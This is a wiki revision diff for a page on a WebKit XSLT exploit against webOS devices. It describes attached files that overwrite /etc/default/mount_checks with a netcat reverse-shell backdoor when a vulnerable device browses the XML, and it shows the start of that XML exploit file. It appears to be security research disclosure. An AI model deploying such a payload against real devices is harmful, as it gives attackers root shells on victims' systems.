Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48
From version Icon 12.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 00:33
Change comment: There is no comment for this version
To version Icon 15.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 00:41
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -34,7 +34,7 @@
34 34  
35 35  [[image:ipad-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
36 36  
37 -== Meatsploit ==
37 +== Metasploit ==
38 38  
39 39  Two modules are included in Metasploit :
40 40  
... ... @@ -47,3 +47,5 @@
47 47  
48 48  * [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction triggering the XSLT code
49 49  * [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
50 +
51 +Browsing the XML file from a vulnerable device is enough to trigger the exploit.
Icon webos-root-backdoor.xml
Size
... ... @@ -1,1 +1,1 @@
1 -1711
1 +1721
Content
... ... @@ -1,5 +1,5 @@
1 1  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 -<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
2 +<?xml-stylesheet type="text/xsl" href="webos-root-backdoor.xsl"?>
3 3  <exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 4  
5 5  # Backdoor, by Nicolas Gregoire / Agarri